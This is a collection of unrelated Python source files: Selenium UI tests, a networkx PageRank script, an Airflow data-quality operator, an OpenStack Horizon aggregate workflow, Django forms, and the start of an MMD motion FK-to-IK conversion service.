bys_points, values_points = self.childConfigXML("数据中心", "渠道佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Channel_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_easylife_Summary_commission(self):
"""
好生活结佣汇总
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "好生活结佣汇总")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.easylife_Summary_commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_easylife_Pool_funds(self):
"""
好生活资金池
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "好生活资金池")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.easylife_Pool_funds(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Kpi_Index_management(self):
"""
kpi指标管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "kpi指标管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Kpi_Index_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_easylife_kpi_check(self):
"""
好生活kpi考核
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "好生活kpi考核")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.easylife_kpi_check(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Rejection_pool(self):
"""
驳回统计池
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("数据中心", "驳回统计池")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Rejection_pool(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
    # 人力中心 -- 考勤管理 (HR center -- attendance management)
def get_link_Personal_attendance_record(self):
"""
个人考勤记录
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("人力中心", "个人考勤记录")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Personal_attendance_record(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Monthly_Attendance_Statistics(self):
"""
考勤月度统计
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("人力中心", "考勤月度统计")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Monthly_Attendance_Statistics(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Attendance_management(self):
"""
考勤人员管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("人力中心", "考勤人员管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Attendance_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
|
from operator import itemgetter
import networkx as nx
import pickle
from crawl import WikiPage
def calculate_ranks():
    """Load the crawled pages, build their link graph, and print
    PageRank rankings (several damping factors) plus HITS rankings.
    """
    # Context manager guarantees the dump file is closed even on error
    # (the original leaked the handle on a pickle failure).
    # NOTE(review): pickle.load is only safe on trusted input files.
    with open('wiki_pages.bin', 'rb') as dump_file:
        pages_dict = pickle.load(dump_file)

    graph = create_graph(pages_dict)
    # Compare PageRank's sensitivity to the damping factor alpha.
    for alpha in (0.85, 0.95, 0.5, 0.3):
        pagerank(graph, alpha, pages_dict)
    hits(graph, pages_dict)
def create_graph(pages_dict):
    """Build a directed graph with an edge for every internal link
    between crawled pages (links to uncrawled URLs are dropped).
    """
    graph = nx.DiGraph()
    # dict.items(): iteritems() was Python-2-only and crashes on Python 3,
    # which the rest of this script (print() calls) targets.
    for url, page in pages_dict.items():
        for link in page.links:
            if link in pages_dict:
                graph.add_edge(url, link)
    return graph
def pagerank(graph, alpha, pages_dict):
    """Print the ten highest-PageRank pages for damping factor *alpha*."""
    scores = nx.pagerank(graph, alpha=alpha)
    leaders = top10(scores, pages_dict)
    print_pages_results(leaders, 'PageRank results, alpha=%s' % alpha)
def hits(graph, pages_dict):
    """Run HITS and print the top-10 hubs, authorities, and the mean of both."""
    hubs, authorities = nx.hits(graph, max_iter=500, tol=0.1)
    # Average hub and authority score per URL.
    # dict comprehension with .items(): iteritems() was Python-2-only.
    mean_hits = {url: (hub + authorities[url]) / 2.0
                 for url, hub in hubs.items()}
    print_pages_results(top10(hubs, pages_dict), 'Hubs results')
    print_pages_results(top10(authorities, pages_dict), 'Authorities results')
    print_pages_results(top10(mean_hits, pages_dict), 'Mean hits results')
def top10(items_dict, pages_dict):
    """Return [(page, score)] pairs for the ten highest-scored URLs.

    *items_dict* maps url -> score; *pages_dict* maps url -> page object.
    """
    # .items() replaces the Python-2-only iteritems().
    ranks = sorted(items_dict.items(), key=itemgetter(1), reverse=True)[:10]
    return [(pages_dict[url], rank) for url, rank in ranks]
def print_pages_results(pages_results, title=""):
    """Pretty-print (page, rank) pairs under a title banner."""
    print('\n%s:' % title)
    # Was a bare Python 2 print statement — a SyntaxError on Python 3.
    print('--------------------------------------------------------')
    for page, rank in pages_results:
        print('{} < {} >'.format(page.title, rank))
        print(page.url)
        print('%s\n' % page.snippet)
# Guard the entry point so importing this module for its helpers
# does not trigger a full ranking run.
if __name__ == '__main__':
    calculate_ranks()
|
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
from helpers import SqlDataQualityQueries
class DataQualityOperator(BaseOperator):
    """Airflow operator that runs per-table data-quality SQL checks
    against Redshift and logs a PASS/FAIL verdict for each table.

    NOTE(review): failures are only logged, never raised, so the task
    always succeeds — confirm that is intentional for this pipeline.
    """

    ui_color = "#89DA59"

    @apply_defaults
    def __init__(self,
                 tables,
                 redshift_conn_id="redshift",
                 *args, **kwargs):
        """
        :param tables: iterable of table names to check; tables with no
            entry in SqlDataQualityQueries.queries are skipped silently.
        :param redshift_conn_id: Airflow connection id for Redshift.
        """
        super(DataQualityOperator, self).__init__(*args, **kwargs)
        self.redshift_conn_id = redshift_conn_id
        self.tables = tables

    def execute(self, context):
        """Run the registered quality query for each configured table."""
        # PostgresHook() always returns an instance; the previous
        # `is not None` guard could never be False and was removed.
        redshift_hook = PostgresHook(self.redshift_conn_id)
        for tbl in self.tables:
            if tbl not in SqlDataQualityQueries.queries:
                # No check registered for this table; skip it.
                continue
            self.log.info(f"Running quality checks for table {tbl}.")
            test = SqlDataQualityQueries.queries[tbl]
            query = test['test'].format(tbl)
            self.log.info(f"Running test: {query}")
            result = redshift_hook.get_records(query)
            num_records = result[0][0]
            # A check passes when the count matches 'expected' or differs
            # from 'not_expected'; a test with neither key always fails.
            test_pass = False
            if "expected" in test:
                test_pass = num_records == test['expected']
            elif "not_expected" in test:
                test_pass = num_records != test['not_expected']
            # Was print(); route through the task log like everything else.
            self.log.info(f"Result: {result}")
            if test_pass:
                self.log.info("==== TEST PASS ====")
            else:
                self.log.info("==== TEST FAIL ====")
            self.log.info("")
|
from django.contrib import admin
from models import Gem, Potion, Material
class GemAdmin(admin.ModelAdmin):
    # Columns shown on the Gem changelist page.
    list_display = ('name', 'unique', 'rank_unique')
class PotionAdmin(admin.ModelAdmin):
    # Columns shown on the Potion changelist page.
    list_display = ('name', 'unique')
class MaterialAdmin(admin.ModelAdmin):
    # Columns on the Material changelist; both 'pk' and 'id' are shown,
    # presumably for debugging — they display the same value.
    list_display = ('name', 'pk', 'rarity', 'unique', 'id',)
    # Sidebar filter by rarity.
    list_filter = ('rarity',)
# Expose the inventory models in the Django admin with their custom options.
admin.site.register(Gem, GemAdmin)
admin.site.register(Potion, PotionAdmin)
admin.site.register(Material, MaterialAdmin)
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import gettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.aggregates import constants
class SetAggregateInfoAction(workflows.Action):
    """First workflow step: name the new host aggregate and optionally
    assign it an availability zone."""
    name = forms.CharField(label=_("Name"),
                           max_length=255)
    availability_zone = forms.CharField(label=_("Availability Zone"),
                                        required=False,
                                        max_length=255)

    class Meta(object):
        name = _("Host Aggregate Information")
        help_text = _("Host aggregates divide an availability zone into "
                      "logical units by grouping together hosts. Create a "
                      "host aggregate then select the hosts contained in it.")
        slug = "set_aggregate_info"

    def clean(self):
        """Reject aggregate names already in use (case-insensitive)."""
        cleaned_data = super().clean()
        name = cleaned_data.get('name', '')
        try:
            aggregates = api.nova.aggregate_details_list(self.request)
        except Exception:
            msg = _('Unable to get host aggregate list')
            exceptions.handle(self.request, msg)
            # Re-raise so the form does not silently pass validation.
            raise
        if aggregates is not None:
            for aggregate in aggregates:
                if aggregate.name.lower() == name.lower():
                    raise forms.ValidationError(
                        _('The name "%s" is already used by '
                          'another host aggregate.')
                        % name
                    )
        return cleaned_data
class SetAggregateInfoStep(workflows.Step):
    # Feeds the aggregate name and availability zone into the workflow context.
    action_class = SetAggregateInfoAction
    contributes = ("availability_zone",
                   "name")
class AddHostsToAggregateAction(workflows.MembershipAction):
    """Membership action listing every nova-compute host so the user can
    pick which ones should join the new aggregate."""

    def __init__(self, request, *args, **kwargs):
        super().__init__(request, *args, **kwargs)
        err_msg = _('Unable to get the available hosts')

        role_field = self.get_default_role_field_name()
        self.fields[role_field] = forms.CharField(required=False)
        self.fields[role_field].initial = 'member'

        member_field = self.get_member_field_name('member')
        self.fields[member_field] = forms.MultipleChoiceField(required=False)

        compute_services = []
        try:
            compute_services = api.nova.service_list(request,
                                                     binary='nova-compute')
        except Exception:
            exceptions.handle(request, err_msg)

        # Offer every compute host, sorted, as a (value, label) choice.
        hosts = sorted(service.host for service in compute_services)
        self.fields[member_field].choices = [(host, host) for host in hosts]

    class Meta(object):
        name = _("Manage Hosts within Aggregate")
        slug = "add_host_to_aggregate"
class ManageAggregateHostsAction(workflows.MembershipAction):
    """Membership action that pre-selects the hosts already in the
    aggregate so its membership can be edited."""

    def __init__(self, request, *args, **kwargs):
        super().__init__(request, *args, **kwargs)
        err_msg = _('Unable to get the available hosts')

        role_field = self.get_default_role_field_name()
        self.fields[role_field] = forms.CharField(required=False)
        self.fields[role_field].initial = 'member'

        member_field = self.get_member_field_name('member')
        self.fields[member_field] = forms.MultipleChoiceField(required=False)

        # Current membership of the aggregate being edited.
        aggregate = api.nova.aggregate_get(request, self.initial['id'])
        current_hosts = aggregate.hosts

        compute_services = []
        try:
            compute_services = api.nova.service_list(request,
                                                     binary='nova-compute')
        except Exception:
            exceptions.handle(request, err_msg)

        # Offer every compute host, sorted; pre-select current members.
        hosts = sorted(service.host for service in compute_services)
        self.fields[member_field].choices = [(host, host) for host in hosts]
        self.fields[member_field].initial = current_hosts

    class Meta(object):
        name = _("Manage Hosts within Aggregate")
class AddHostsToAggregateStep(workflows.UpdateMembersStep):
    """Creation-workflow step wrapping AddHostsToAggregateAction."""
    action_class = AddHostsToAggregateAction
    help_text = _("Add hosts to this aggregate. Hosts can be in multiple "
                  "aggregates.")
    available_list_title = _("All available hosts")
    members_list_title = _("Selected hosts")
    no_available_text = _("No hosts found.")
    no_members_text = _("No host selected.")
    show_roles = False
    contributes = ("hosts_aggregate",)

    def contribute(self, data, context):
        """Copy the selected member hosts into the workflow context."""
        if data:
            context['hosts_aggregate'] = data.get(
                self.get_member_field_name('member'), [])
        return context
class ManageAggregateHostsStep(workflows.UpdateMembersStep):
    """Edit-workflow step wrapping ManageAggregateHostsAction."""
    action_class = ManageAggregateHostsAction
    help_text = _("Add hosts to this aggregate or remove hosts from it. "
                  "Hosts can be in multiple aggregates.")
    available_list_title = _("All Available Hosts")
    members_list_title = _("Selected Hosts")
    no_available_text = _("No Hosts found.")
    no_members_text = _("No Host selected.")
    show_roles = False
    depends_on = ("id",)
    contributes = ("hosts_aggregate",)

    def contribute(self, data, context):
        """Copy the selected member hosts into the workflow context."""
        if data:
            context['hosts_aggregate'] = data.get(
                self.get_member_field_name('member'), [])
        return context
class CreateAggregateWorkflow(workflows.Workflow):
    """Two-step workflow: collect aggregate info, then initial host
    membership, and create the aggregate via nova."""
    slug = "create_aggregate"
    name = _("Create Host Aggregate")
    finalize_button_name = _("Create Host Aggregate")
    success_message = _('Created new host aggregate "%s".')
    failure_message = _('Unable to create host aggregate "%s".')
    success_url = constants.AGGREGATES_INDEX_URL
    default_steps = (SetAggregateInfoStep, AddHostsToAggregateStep)

    def format_status_message(self, message):
        # Substitute the aggregate name into the success/failure templates.
        return message % self.context['name']

    def handle(self, request, context):
        """Create the aggregate, then add each selected host to it.

        Returns False only when the aggregate itself could not be
        created; a host-add failure still reports success (see below).
        """
        try:
            self.object = \
                api.nova.aggregate_create(
                    request,
                    name=context['name'],
                    availability_zone=context['availability_zone'] or None)
        except Exception:
            exceptions.handle(request, _('Unable to create host aggregate.'))
            return False

        context_hosts_aggregate = context['hosts_aggregate']
        for host in context_hosts_aggregate:
            try:
                api.nova.add_host_to_aggregate(request, self.object.id, host)
            except Exception:
                exceptions.handle(
                    request, _('Error adding Hosts to the aggregate.'))
                # Host aggregate itself has been created successfully,
                # so we return True here
                return True
        return True
class ManageAggregateHostsWorkflow(workflows.Workflow):
    """Workflow that syncs an aggregate's host list with the user's
    selection by diffing current vs. desired membership."""
    slug = "manage_hosts_aggregate"
    name = _("Add/Remove Hosts to Aggregate")
    finalize_button_name = _("Save")
    success_message = _('The Aggregate was updated.')
    failure_message = _('Unable to update the aggregate.')
    success_url = constants.AGGREGATES_INDEX_URL
    default_steps = (ManageAggregateHostsStep, )

    def handle(self, request, context):
        """Apply the selected membership; returns False on any API error."""
        aggregate_id = context['id']
        current = set(api.nova.aggregate_get(request, aggregate_id).hosts)
        desired = set(context['hosts_aggregate'])
        try:
            # Drop hosts that were deselected, then add the new ones.
            for host in current - desired:
                api.nova.remove_host_from_aggregate(request,
                                                    aggregate_id,
                                                    host)
            for host in desired - current:
                api.nova.add_host_to_aggregate(request, aggregate_id, host)
        except Exception:
            exceptions.handle(
                request, _('Error when adding or removing hosts.'))
            return False
        return True
|
import os
import yaml
def readYAML(filePath):
    """Parse the YAML file at *filePath* and return its contents
    (None for an empty document)."""
    # FullLoader resolves standard YAML tags but not arbitrary Python objects.
    with open(filePath, 'r') as inFile:
        return yaml.load(inFile, Loader=yaml.FullLoader)
|
# -*- coding: utf-8 -*-
class Marvel_Characters():
    """Small catalogue of Marvel character names grouped by trait."""

    def getCharacters(self):
        """Return the core character roster."""
        return "Hulk, Thor, Ironman"

    # Fliers/Runners were defined without `self`, so calling them on an
    # instance raised TypeError. @staticmethod fixes instance calls while
    # keeping the existing class-level call style working.
    @staticmethod
    def Fliers():
        """Return the characters that can fly."""
        return "Falcon, Wanda"

    @staticmethod
    def Runners():
        """Return the speedster characters."""
        return "Quicksilver"
from django import forms
from sozlukContent.models import SozlukContent
from django.contrib.auth.models import User
class WordForm(forms.ModelForm):
    """ModelForm exposing the editable fields of a dictionary entry
    (SozlukContent): translations, examples, media and annotations."""
    class Meta:
        model = SozlukContent
        # Field names mix Turkish/German abbreviations; order mirrors the
        # entry layout (example, submitter, grammar data, translations,
        # media, definitions, flags, then bilingual annotation pairs).
        fields = [
            'orn',
            'ekleyen',
            'artikel',
            'kategori',
            'plural_wort_status',
            'asw_de',
            'asw_tr',
            'tr',
            'en',
            'de',
            'referans_video',
            'tr_def',
            'de_def',
            'active',
            'ekleyenId',
            'abz_de',
            'abz_tr',
            'synm_de',
            'synm_tr',
            'anmerkungen_de',
            'anmerkungen_tr',
            'kontext_de',
            'kontext_tr',
        ]
class LoginForm(forms.Form):
    """Plain login form; labels are Turkish ("Kullanıcı Adı" = username,
    "Parola" = password)."""
    username=forms.CharField(max_length=150,label='Kullanıcı Adı')
    password=forms.CharField(max_length=150,label='Parola',widget=forms.PasswordInput)
class RegisterForm(forms.ModelForm):
    """Registration form with double password entry.

    NOTE(review): nothing here hashes the password — confirm the view
    calls User.set_password() before saving, and that this Django
    version accepts non-model fields in Meta.fields.
    """
    nameSurname=forms.CharField(max_length=150,label='Ad Soyad')
    username=forms.CharField(max_length=150,label='Kullanıcı Adı')
    email=forms.EmailField(max_length=150,label='Email',widget=forms.EmailInput)
    password1=forms.CharField(max_length=150,label='Parola',widget=forms.PasswordInput)
    password2=forms.CharField(max_length=150,label='Parola',widget=forms.PasswordInput)
    class Meta:
        model=User
        fields=[
            'username',
            'password1',
            'password2',
            'nameSurname',
            'email',
        ]
    def clean_password2(self):
        """Validate that both password fields match; return password2."""
        password1=self.cleaned_data.get('password1')
        password2=self.cleaned_data.get('password2')
        if password1 and password2 and password1 != password2:
            # Fixed user-facing typo: "Parololar" -> "Parolalar"
            # (Turkish: "passwords do not match").
            raise forms.ValidationError("Parolalar eşleşmiyor")
        return password2
|
# Tutorial: tuples store references, so mutating a contained list is
# visible through every name that shares it.
x = [1, 2, 3]  # Create the first list
y = [4, 5, 6]  # Create the second list
t = (x, y)  # Pack the two lists into a tuple
print(t)  # Print the tuple
print(type(t))  # Display the type 'tuple'
print(t[0])  # Display the first list
print(t[0][1])  # Display the second element of the first list
a, b = t  # Unpack: 'a' gets the first list, 'b' the second
print(a)  # Display the first list
print(b)  # Display the second list
a[0] = 'sorry'  # Mutate the first item of 'a' (an alias of 'x')
print(a)  # Display the list 'a'
print(x)  # Display how list 'x' has changed (same object as 'a')
c = 'Hello!',  # A trailing comma quietly creates a 1-tuple
print(type(c))  # Show that 'c' is now a tuple
|
import unittest
import time
from selenium import webdriver
class MemberManageTest(unittest.TestCase):
    """UI smoke test: log into the local admin backend and add a member."""

    def setUp(self):
        # Fresh Chrome session per test; implicit wait covers slow page loads.
        self.driver = webdriver.Chrome()
        self.driver.implicitly_wait(30)
        self.driver.maximize_window()

    def tearDown(self):
        # NOTE(review): the fixed 10s sleep looks like a visual-inspection
        # aid — consider removing it for CI speed.
        time.sleep(10)
        self.driver.quit()

    def test_addMember(self):
        """Log in, open the "添加会员" (add member) page and submit a member form."""
        # NOTE(review): find_element_by_* is removed in Selenium 4 —
        # migrate to find_element(By.NAME, ...) when upgrading.
        driver = self.driver
        driver.get("http://localhost/index.php?m=admin&c=public&a=login")
        # NOTE(review): hard-coded credentials and the fixed captcha "1111"
        # imply a test environment with captcha verification stubbed out.
        driver.find_element_by_name("username").send_keys("admin")
        driver.find_element_by_name("userpass").send_keys("password")
        driver.find_element_by_name("userverify").send_keys("1111")
        driver.find_element_by_class_name("Btn").click()
        # Open the 4th top-level menu entry, then the add-member link.
        driver.find_elements_by_css_selector("div.menu.fl>a")[3].click()
        #driver.find_element_by_css_selector("div.side>ul:nth-child(3)>li:nth-child(3)>a").click()
        driver.find_element_by_link_text("添加会员").click()
        # The member form is rendered inside an iframe.
        driver.switch_to.frame("mainFrame")
        driver.find_element_by_name("username").send_keys("123456")
        driver.find_element_by_name("mobile_phone").send_keys("13800383015")
        # Selects the radio/option whose value is '0' (meaning not shown here).
        driver.find_element_by_css_selector("[value='0']").click()
        driver.find_element_by_id("birthday").send_keys("2017-11-24")
        driver.find_element_by_name("email").send_keys("1452@qq.com")
        driver.find_element_by_name("qq").send_keys("12456789")
        driver.find_element_by_class_name("button_search").click()
|
class AdProfile:
    """Value object holding an advertisement's title and description."""

    def __init__(self, title, description):
        # NOTE(review): presumably both are strings — confirm at call sites.
        self.title = title
        self.description = description

    def __repr__(self):
        # Readable repr for debugging/logging; no caller relied on the default.
        return f"{type(self).__name__}(title={self.title!r}, description={self.description!r})"
# -*- coding: utf-8 -*-
#
import logging
import os
import traceback
import concurrent.futures
from concurrent.futures import ThreadPoolExecutor
import numpy as np
from module.MOptions import MLegFKtoIKOptions, MOptionsDataSet
from mmd.PmxData import PmxModel # noqa
from mmd.VmdData import VmdMotion, VmdBoneFrame, VmdCameraFrame, VmdInfoIk, VmdLightFrame, VmdMorphFrame, VmdShadowFrame, VmdShowIkFrame # noqa
from mmd.VmdWriter import VmdWriter
from module.MMath import MRect, MVector3D, MVector4D, MQuaternion, MMatrix4x4 # noqa
from utils import MUtils, MServiceUtils, MBezierUtils # noqa
from utils.MLogger import MLogger # noqa
from utils.MException import SizingException, MKilledException
logger = MLogger(__name__, level=MLogger.INFO)
class ConvertLegFKtoIKService():
    """Service that converts leg FK bone motion into leg IK keyframes for
    an MMD model and writes the result out as a new VMD file."""

    def __init__(self, options: MLegFKtoIKOptions):
        self.options = options

    def execute(self):
        """Run the conversion: optional foot grounding, per-leg FK->IK
        conversion on worker threads, then VMD output.

        Returns True on success, False on failure or cancellation.
        """
        logging.basicConfig(level=self.options.logging_level, format="%(message)s [%(module_name)s]")

        try:
            # Build the run-summary text shown to the user.
            # BUGFIX: the first assignment ended with a stray line-continuation
            # "\" that fused it with the next statement into a SyntaxError.
            service_data_txt = "足IK変換処理実行\n------------------------\nexeバージョン: {version_name}\n".format(version_name=self.options.version_name)
            service_data_txt = "{service_data_txt} VMD: {vmd}\n".format(service_data_txt=service_data_txt,
                                                                       vmd=os.path.basename(self.options.motion.path))  # noqa
            # BUGFIX: the モデル (model) line formatted the *motion* path —
            # copy-paste error; it now shows the model file name.
            service_data_txt = "{service_data_txt} モデル: {model}({model_name})\n".format(service_data_txt=service_data_txt,
                                                                                      model=os.path.basename(self.options.model.path), model_name=self.options.model.name)  # noqa
            service_data_txt = "{service_data_txt} 足首水平化: {ankle_horizonal_flg}\n".format(service_data_txt=service_data_txt,
                                                                                        ankle_horizonal_flg=self.options.ankle_horizonal_flg)  # noqa
            service_data_txt = "{service_data_txt} かかと・つま先Y=0: {ground_leg_flg}\n".format(service_data_txt=service_data_txt,
                                                                                        ground_leg_flg=self.options.ground_leg_flg)  # noqa
            service_data_txt = "{service_data_txt} 足IKブレ固定: {leg_error_tolerance}\n".format(service_data_txt=service_data_txt,
                                                                                        leg_error_tolerance=self.options.leg_error_tolerance)  # noqa
            service_data_txt = "{service_data_txt} 不要キー削除: {center_rotation}\n".format(service_data_txt=service_data_txt,
                                                                                      center_rotation=self.options.remove_unnecessary_flg)  # noqa

            logger.info(service_data_txt, decoration=MLogger.DECORATION_BOX)

            # # If ankle-leveling is enabled, level the ankles first
            # if self.options.ankle_horizonal_flg:
            #     self.prepare_ankle_horizonal()

            # If grounding is enabled, ground the feet first.
            if self.options.ground_leg_flg:
                self.prepare_ground()

            # Convert both legs in parallel; stop at the first failure.
            futures = []
            with ThreadPoolExecutor(thread_name_prefix="leffk", max_workers=self.options.max_workers) as executor:
                futures.append(executor.submit(self.convert_leg_fk2ik, "右"))
                futures.append(executor.submit(self.convert_leg_fk2ik, "左"))
            concurrent.futures.wait(futures, timeout=None, return_when=concurrent.futures.FIRST_EXCEPTION)

            for f in futures:
                if not f.result():
                    return False

            # Finally, write the converted motion out.
            VmdWriter(MOptionsDataSet(self.options.motion, None, self.options.model, self.options.output_path, False, False, [], None, 0, [])).write()

            logger.info("出力終了: %s", os.path.basename(self.options.output_path), decoration=MLogger.DECORATION_BOX, title="成功")

            return True
        except MKilledException:
            # User-initiated cancellation.
            return False
        except SizingException as se:
            logger.error("足IK変換処理が処理できないデータで終了しました。\n\n%s", se.message, decoration=MLogger.DECORATION_BOX)
        except Exception:
            logger.critical("足IK変換処理が意図せぬエラーで終了しました。\n\n%s", traceback.format_exc(), decoration=MLogger.DECORATION_BOX)
        finally:
            logging.shutdown()

    # Prepare grounding of the leg IK (shift center Y so soles touch Y=0).
    def prepare_ground(self):
        """Estimate the grounded sole height (median over all frames) and
        shift the center/groove Y keys down by that amount."""
        logger.info("足IK接地", decoration=MLogger.DECORATION_LINE)

        motion = self.options.motion
        model = self.options.model

        # Link chains down to the FK toe-tip entities.
        right_fk_links = model.create_link_2_top_one("右つま先実体", is_defined=False)
        left_fk_links = model.create_link_2_top_one("左つま先実体", is_defined=False)

        # Pick the bones that actually carry X/Y/Z center motion
        # (multi-center setups use センターMX / グルーブMY / センターMZ).
        center_x_bone_name = "センター"
        if not motion.is_active_bones("センター") and motion.is_active_bones("センターMX"):
            center_x_bone_name = "センターMX"

        # If the groove bone has keys, Y goes on the groove instead.
        center_y_bone_name = "センター"
        if motion.is_active_bones("グルーブ"):
            center_y_bone_name = "グルーブ"
        elif not motion.is_active_bones("センター") and motion.is_active_bones("センターMX"):
            center_y_bone_name = "グルーブMY"

        center_z_bone_name = "センター"
        if not motion.is_active_bones("センター") and motion.is_active_bones("センターMZ"):
            center_z_bone_name = "センターMZ"

        # Leg-FK keyframe numbers in the relevant range.
        fnos = motion.get_bone_fnos("左足", "左ひざ", "左足首", "右足", "右ひざ", "右足首", "下半身", center_x_bone_name, center_y_bone_name, center_z_bone_name)

        # Collect sole/toe heights over all frames for the median estimate.
        prev_sep_fno = 0
        min_ys = []
        for fidx, fno in enumerate(fnos):
            right_fk_3ds = MServiceUtils.calc_global_pos(model, right_fk_links, motion, fno)
            right_toe_pos = right_fk_3ds["右つま先実体"]
            right_sole_pos = right_fk_3ds["右足底実体"]
            left_fk_3ds = MServiceUtils.calc_global_pos(model, left_fk_links, motion, fno)
            left_toe_pos = left_fk_3ds["左つま先実体"]
            left_sole_pos = left_fk_3ds["左足底実体"]
            min_ys.append(right_sole_pos.y())
            min_ys.append(left_sole_pos.y())
            min_ys.append(right_toe_pos.y())
            min_ys.append(left_toe_pos.y())
            if fno // 500 > prev_sep_fno:
                logger.count("【足IK接地準備】", fno, fnos)
                prev_sep_fno = fno // 500

        # The median height is assumed to be roughly "on the ground".
        median_leg_y = np.median(min_ys)
        logger.debug("接地: median: %s", median_leg_y)

        # # Alternative: bias the estimate toward the upper half
        # median_leg_y = np.median(np.array(min_ys)[min_ys > median_leg_y])
        # logger.debug("接地: median2: %s", median_leg_y)

        prev_sep_fno = 0
        for fidx, fno in enumerate(fnos):
            # Shift the Y position down by the grounded median.
            center_y_bf = motion.calc_bf(center_y_bone_name, fno)
            center_y_bf.position.setY(center_y_bf.position.y() - median_leg_y)
            motion.regist_bf(center_y_bf, center_y_bone_name, fno)
            if fno // 500 > prev_sep_fno:
                logger.count("【足IK接地】", fno, fnos)
                prev_sep_fno = fno // 500

    # Execute the leg FK -> IK conversion for one side.
    def convert_leg_fk2ik(self, direction: str):
        """Convert the FK leg chain of *direction* ("右"/"左") into leg-IK
        position/rotation keyframes, optionally pinning jittery IK frames.

        Returns True when the leg finished converting.
        """
        logger.info("足IK変換 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)

        motion = self.options.motion
        model = self.options.model

        leg_ik_bone_name = "{0}足IK".format(direction)
        toe_ik_bone_name = "{0}つま先IK".format(direction)
        leg_bone_name = "{0}足".format(direction)
        knee_bone_name = "{0}ひざ".format(direction)
        ankle_bone_name = "{0}足首".format(direction)

        # Link chain down to the FK ankle.
        fk_links = model.create_link_2_top_one(ankle_bone_name, is_defined=False)
        # Link chain down to the leg IK.
        ik_links = model.create_link_2_top_one(leg_ik_bone_name, is_defined=False)
        # Link chain down to the toe IK.
        toe_ik_links = model.create_link_2_top_one(toe_ik_bone_name, is_defined=False)
        # Toe bone (the ankle's child) targeted by the toe IK.
        ankle_child_bone_name = model.bone_indexes[model.bones[toe_ik_bone_name].ik.target_index]
        # Link chain down to the toe tip.
        toe_fk_links = model.create_link_2_top_one(ankle_child_bone_name, is_defined=False)

        fnos = motion.get_bone_fnos(leg_bone_name, knee_bone_name, ankle_bone_name)

        # First register an IK key at every FK keyframe.
        prev_sep_fno = 0
        fno = 0
        for fno in fnos:
            bf = motion.calc_bf(leg_ik_bone_name, fno)
            motion.regist_bf(bf, leg_ik_bone_name, fno)
            if fno // 1000 > prev_sep_fno and fnos[-1] > 0:
                logger.count(f"【準備 - {leg_ik_bone_name}】", fno, fnos)
                prev_sep_fno = fno // 1000

        logger.info("準備完了 【%s足IK】", direction, decoration=MLogger.DECORATION_LINE)

        ik_parent_name = ik_links.get(leg_ik_bone_name, offset=-1).name

        # Transplant the FK pose onto the leg IK, frame by frame.
